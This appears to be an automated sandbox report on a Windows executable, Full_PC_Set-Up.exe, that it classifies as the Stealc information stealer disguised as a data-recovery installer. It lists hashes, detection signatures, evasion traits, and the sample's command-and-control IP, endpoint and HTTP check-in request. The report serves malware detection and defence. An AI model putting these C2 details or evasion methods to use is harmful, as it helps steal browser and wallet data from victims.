Windows Analysis Report
Full_PC_Set-Up.exe

Overview

General Information

Sample name: Full_PC_Set-Up.exe
Analysis ID: 1525664
MD5: 7400e305a002a18fbec6a6d189ef6879
SHA1: 04138fb49978d5005bd5e9be7c958227131d8437
SHA256: 32df795e1539a4c4adce359c6fcc9be616db4591937072197171c6c5c465297e
Tags: exe, user-aachum

Detection

Stealc
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Contains functionality to behave differently if executed on a Russian/Kazakh computer
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0030D910 CreateFileW,CreateFileW,GetLastError,GetLastError,swprintf,CreateFileW,GetLastError,__wsplitpath,CloseHandle,CreateFileW,GetLastError,CloseHandle,CloseHandle,ReadFile,ReadFile,WriteFile,ReadFile,WriteFile,WriteFile,ReadFile,WriteFile,WriteFile,CloseHandle,CloseHandle,OpenEncryptedFileRawW,SetFilePointer,WriteEncryptedFileRaw,CloseEncryptedFileRaw,CloseHandle,DeleteFileW,GetLastError,CloseHandle, 0_2_0030D910
Source: Full_PC_Set-Up.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Full_PC_Set-Up.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: d:\work\edr\bin\Release\7DataPartitionRecovery.pdb source: Full_PC_Set-Up.exe
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00374078 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW, 0_2_00374078
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_002CCA90 _memset,_memset,_memset,GetLogicalDrives,GetDriveTypeW,GetVolumeInformationW,GetLastError,CreateFileW,CloseHandle,DeleteFileW,FindFirstFileW,FindClose,CreateFileW,CloseHandle, 0_2_002CCA90

Networking

Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49735 -> 45.200.148.115:80
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: 45.200.148.115 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDGCGDBGCAAEBFIECGHD Host: 45.200.148.115 Content-Length: 208 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 35 44 35 45 36 32 46 45 45 35 38 34 35 37 37 30 33 39 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 62 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 2d 2d 0d 0a Data Ascii: ------JDGCGDBGCAAEBFIECGHD Content-Disposition: form-data; name="hwid" 865D5E62FEE5845770397 ------JDGCGDBGCAAEBFIECGHD Content-Disposition: form-data; name="build" b6 ------JDGCGDBGCAAEBFIECGHD--
Source: Joe Sandbox View ASN Name: Africa-on-Cloud-ASZA Africa-on-Cloud-ASZA
Source: unknown TCP traffic detected without corresponding DNS query: 45.200.148.115
Source: unknown TCP traffic detected without corresponding DNS query: 45.200.148.115
Source: unknown TCP traffic detected without corresponding DNS query: 45.200.148.115
Source: unknown TCP traffic detected without corresponding DNS query: 45.200.148.115
Source: unknown TCP traffic detected without corresponding DNS query: 45.200.148.115
Source: unknown TCP traffic detected without corresponding DNS query: 45.200.148.115
Source: unknown TCP traffic detected without corresponding DNS query: 45.200.148.115
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: 45.200.148.115 Connection: Keep-Alive Cache-Control: no-cache
Source: Full_PC_Set-Up.exe, 00000000.00000000.1798820680.00000000004DA000.00000002.00000001.01000000.00000003.sdmp, Full_PC_Set-Up.exe, 00000000.00000002.1876438795.00000000004DA000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: K*7-Data%d.%dSOFTWARE\EDRFreeRestoredSize\7drs.iniUrlIndexBuy\unins000.exehttp://7datarecoverysoftware.com/buy/7drs-st.phphttp://7datarecoverysoftware.com/buy/7drs.phphttp://7datarecoverysoftware.com/buy/7drs-ptb.phphttp://7datarecoverysoftware.com/?ref=apphttp://7datarecoverysoftware.com/support/?ref=apphttp://7datarecoverysoftware.com/update/http://www.facebook.com/pages/7-Data-Recovery-Software/145405585627896https://twitter.com/7Datahttp://7datarecoverysoftware.com/news/suite.xmlsupport@7datarecoverysoftware.com7datarecovery supportH{U@ equals www.facebook.com (Facebook)
Source: Full_PC_Set-Up.exe, 00000000.00000000.1798820680.00000000004DA000.00000002.00000001.01000000.00000003.sdmp, Full_PC_Set-Up.exe, 00000000.00000002.1876438795.00000000004DA000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: K*7-Data%d.%dSOFTWARE\EDRFreeRestoredSize\7drs.iniUrlIndexBuy\unins000.exehttp://7datarecoverysoftware.com/buy/7drs-st.phphttp://7datarecoverysoftware.com/buy/7drs.phphttp://7datarecoverysoftware.com/buy/7drs-ptb.phphttp://7datarecoverysoftware.com/?ref=apphttp://7datarecoverysoftware.com/support/?ref=apphttp://7datarecoverysoftware.com/update/http://www.facebook.com/pages/7-Data-Recovery-Software/145405585627896https://twitter.com/7Datahttp://7datarecoverysoftware.com/news/suite.xmlsupport@7datarecoverysoftware.com7datarecovery supportH{U@ equals www.twitter.com (Twitter)
Source: Full_PC_Set-Up.exe String found in binary or memory: KA7-Data%d.%dSOFTWARE\EDRFreeRestoredSize\7drs.iniUrlIndexBuy\unins000.exehttp://7datarecoverysoftware.com/buy/7drs-st.phphttp://7datarecoverysoftware.com/buy/7drs.phphttp://7datarecoverysoftware.com/buy/7drs-ptb.phphttp://7datarecoverysoftware.com/?ref=apphttp://7datarecoverysoftware.com/support/?ref=apphttp://7datarecoverysoftware.com/update/http://www.facebook.com/pages/7-Data-Recovery-Software/145405585627896https://twitter.com/7Datahttp://7datarecoverysoftware.com/news/suite.xmlsupport@7datarecoverysoftware.com7datarecovery supportH{l@ equals www.facebook.com (Facebook)
Source: Full_PC_Set-Up.exe String found in binary or memory: KA7-Data%d.%dSOFTWARE\EDRFreeRestoredSize\7drs.iniUrlIndexBuy\unins000.exehttp://7datarecoverysoftware.com/buy/7drs-st.phphttp://7datarecoverysoftware.com/buy/7drs.phphttp://7datarecoverysoftware.com/buy/7drs-ptb.phphttp://7datarecoverysoftware.com/?ref=apphttp://7datarecoverysoftware.com/support/?ref=apphttp://7datarecoverysoftware.com/update/http://www.facebook.com/pages/7-Data-Recovery-Software/145405585627896https://twitter.com/7Datahttp://7datarecoverysoftware.com/news/suite.xmlsupport@7datarecoverysoftware.com7datarecovery supportH{l@ equals www.twitter.com (Twitter)
Source: unknown HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDGCGDBGCAAEBFIECGHD Host: 45.200.148.115 Content-Length: 208 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 35 44 35 45 36 32 46 45 45 35 38 34 35 37 37 30 33 39 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 62 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 2d 2d 0d 0a Data Ascii: ------JDGCGDBGCAAEBFIECGHD Content-Disposition: form-data; name="hwid" 865D5E62FEE5845770397 ------JDGCGDBGCAAEBFIECGHD Content-Disposition: form-data; name="build" b6 ------JDGCGDBGCAAEBFIECGHD--
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.115
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000001007000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.115/
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.115/0a616124ff2f2b69.php
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000001007000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.115/0a616124ff2f2b69.php2
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.115/0a616124ff2f2b69.phpM
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.115/0a616124ff2f2b69.phpS
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.115/0a616124ff2f2b69.phpq
Source: Full_PC_Set-Up.exe String found in binary or memory: http://7datarecoverysoftware.com/7dptr-order/?ref=apphttp://7datarecoverysoftware.comhttp://7datarec
Source: Full_PC_Set-Up.exe String found in binary or memory: http://7datarecoverysoftware.com/buy/7drs-st.phphttp://7datarecoverysoftware.com/buy/7drs.phphttp://
Source: Full_PC_Set-Up.exe String found in binary or memory: http://7datarecoverysoftware.com/enable-usb-debugging/http://7datarecoverysoftware.com/usb-connect-a
Source: Full_PC_Set-Up.exe String found in binary or memory: http://aia.startssl.com/certs/ca.crt02
Source: Full_PC_Set-Up.exe String found in binary or memory: http://aia1.wosign.com/ca1g2-code3.cer0
Source: Full_PC_Set-Up.exe String found in binary or memory: http://aia1.wosign.com/ca1g2-ts.cer0
Source: Full_PC_Set-Up.exe String found in binary or memory: http://aia1.wosign.com/ca1g2.ts.cer0
Source: Full_PC_Set-Up.exe String found in binary or memory: http://aia1.wosign.com/ca6.code3.cer06
Source: Full_PC_Set-Up.exe String found in binary or memory: http://crl.startssl.com/sfsca.crl0
Source: Full_PC_Set-Up.exe String found in binary or memory: http://crls1.wosign.com/ca1.crl0h
Source: Full_PC_Set-Up.exe String found in binary or memory: http://crls1.wosign.com/ca1.crl0k
Source: Full_PC_Set-Up.exe String found in binary or memory: http://crls1.wosign.com/ca1g2-ts.crl0m
Source: Full_PC_Set-Up.exe String found in binary or memory: http://crls1.wosign.com/ca6-code3.crl0P
Source: Full_PC_Set-Up.exe String found in binary or memory: http://ocsp.startssl.com/ca00
Source: Full_PC_Set-Up.exe String found in binary or memory: http://ocsp1.wosign.com/ca10/
Source: Full_PC_Set-Up.exe String found in binary or memory: http://ocsp1.wosign.com/ca102
Source: Full_PC_Set-Up.exe String found in binary or memory: http://ocsp1.wosign.com/ca1g2/ts0/
Source: Full_PC_Set-Up.exe String found in binary or memory: http://ocsp1.wosign.com/ca6/code300
Source: Full_PC_Set-Up.exe String found in binary or memory: http://www.kungsoft.com
Source: Full_PC_Set-Up.exe String found in binary or memory: http://www.wosign.com/policy/0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_004B6680: _memset,DeviceIoControl, 0_2_004B6680
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0038E41F 0_2_0038E41F
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0038D97B 0_2_0038D97B
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_002BA050 0_2_002BA050
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_002DA0C0 0_2_002DA0C0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_003960CB 0_2_003960CB
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00484130 0_2_00484130
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_004AC1A9 0_2_004AC1A9
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_003601D0 0_2_003601D0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_004042B0 0_2_004042B0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00324370 0_2_00324370
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0039E486 0_2_0039E486
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0039C75A 0_2_0039C75A
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00366A4A 0_2_00366A4A
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00404AB0 0_2_00404AB0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0048EBD0 0_2_0048EBD0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00372CFB 0_2_00372CFB
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0038ED0D 0_2_0038ED0D
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0040ED80 0_2_0040ED80
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_003D4E30 0_2_003D4E30
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_002F2E30 0_2_002F2E30
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_003F8F30 0_2_003F8F30
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0039EF0E 0_2_0039EF0E
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_002C8FB0 0_2_002C8FB0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_002F7030 0_2_002F7030
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00305140 0_2_00305140
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00321200 0_2_00321200
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00323370 0_2_00323370
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0040F3B0 0_2_0040F3B0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_003853CA 0_2_003853CA
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0038D4D0 0_2_0038D4D0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0038D5DD 0_2_0038D5DD
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_004016E0 0_2_004016E0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_002DB6E0 0_2_002DB6E0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00403710 0_2_00403710
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0038D7B5 0_2_0038D7B5
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_002B3800 0_2_002B3800
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0030F870 0_2_0030F870
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0038D8B2 0_2_0038D8B2
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_003399B0 0_2_003399B0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00407A20 0_2_00407A20
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0048DB70 0_2_0048DB70
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00391BAB 0_2_00391BAB
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_003D5B80 0_2_003D5B80
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00403D30 0_2_00403D30
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: String function: 00383725 appears 37 times
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: String function: 0040E430 appears 123 times
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: String function: 00388CFC appears 45 times
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: String function: 0040E370 appears 60 times
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: String function: 00388BEF appears 49 times
Source: Full_PC_Set-Up.exe Static PE information: invalid certificate
Source: Full_PC_Set-Up.exe Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: Full_PC_Set-Up.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Full_PC_Set-Up.exe Binary string: B\Device\HarddiskDmVolumes\%c:IOCTL_DISK_GET_DRIVE_LAYOUT_EX GetLastError %dIOCTL_DISK_GET_DRIVE_LAYOUT GetLastError %d\Device\Harddisk%u\Partition%u\\.\MountPointManager\DosDevices\\??\Volume{IOCTL_MOUNTMGR_QUERY_POINTS GetLastError %dKernel32.dllGetVolumePathNamesForVolumeNameW\\?\Volume{%s%02x%02x%02x%02x-%02x%02x-%02x%02x-}\%02x%02x-%02x%02x%02x%02x%02x%02x%sbatch_read_sector start %I64d, count: %I64dni(%d) > c_block_count
Source: classification engine Classification label: mal76.troj.expl.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_002CC8D0 GetDiskFreeSpaceExW, 0_2_002CC8D0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_002ECA70 GetWindowRect,CoCreateInstance,SendMessageW,SendMessageW,SendMessageW, 0_2_002ECA70
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0036A09D __EH_prolog3_catch,FindResourceW,LoadResource,LockResource,GetDesktopWindow,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow,FreeResource, 0_2_0036A09D
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\AR7OIXQT.htm
Source: Full_PC_Set-Up.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: oledlg.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: Full_PC_Set-Up.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: Full_PC_Set-Up.exe Static file information: File size 7230768 > 1048576
Source: Full_PC_Set-Up.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x248800
Source: Full_PC_Set-Up.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x14fa00
Source: Full_PC_Set-Up.exe Static PE information: Raw size of .reloc is bigger than: 0x100000 < 0x298a00
Source: Full_PC_Set-Up.exe Static PE information: More than 200 imports for USER32.dll
Source: Full_PC_Set-Up.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Full_PC_Set-Up.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Full_PC_Set-Up.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Full_PC_Set-Up.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Full_PC_Set-Up.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Full_PC_Set-Up.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Full_PC_Set-Up.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Full_PC_Set-Up.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: d:\work\edr\bin\Release\7DataPartitionRecovery.pdb source: Full_PC_Set-Up.exe
Source: Full_PC_Set-Up.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Full_PC_Set-Up.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Full_PC_Set-Up.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Full_PC_Set-Up.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Full_PC_Set-Up.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00298550 GetModuleHandleW,LoadLibraryW,GetProcAddress,GetObjectW, 0_2_00298550
Source: Full_PC_Set-Up.exe Static PE information: real checksum: 0x48470d should be: 0x6f0441
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00388CC7 push ecx; ret 0_2_00388CDA
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00388D41 push ecx; ret 0_2_00388D54

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0029A370 GetSystemDefaultLangID, push 00000419h 0_2_0029A370
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe API coverage: 0.1 %
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00374078 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW, 0_2_00374078
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_002CCA90 _memset,_memset,_memset,GetLogicalDrives,GetDriveTypeW,GetVolumeInformationW,GetLastError,CreateFileW,CloseHandle,DeleteFileW,FindFirstFileW,FindClose,CreateFileW,CloseHandle, 0_2_002CCA90
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.000000000102F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW>
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_003812A6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_003812A6
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00298550 GetModuleHandleW,LoadLibraryW,GetProcAddress,GetObjectW, 0_2_00298550
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0039FBF7 CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, 0_2_0039FBF7
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_002961A0 CoInitialize,GetCommandLineW,CommandLineToArgvW,LocalFree,CreateMutexW,SetUnhandledExceptionFilter,InitCommonControlsEx,__wsetlocale,GdiplusStartup,DefWindowProcW,LoadIconW,LoadCursorW,GetStockObject,RegisterClassW,MessageBoxW,GetLastError, 0_2_002961A0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_003812A6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_003812A6
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00381608 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00381608
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0038B6F3 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0038B6F3
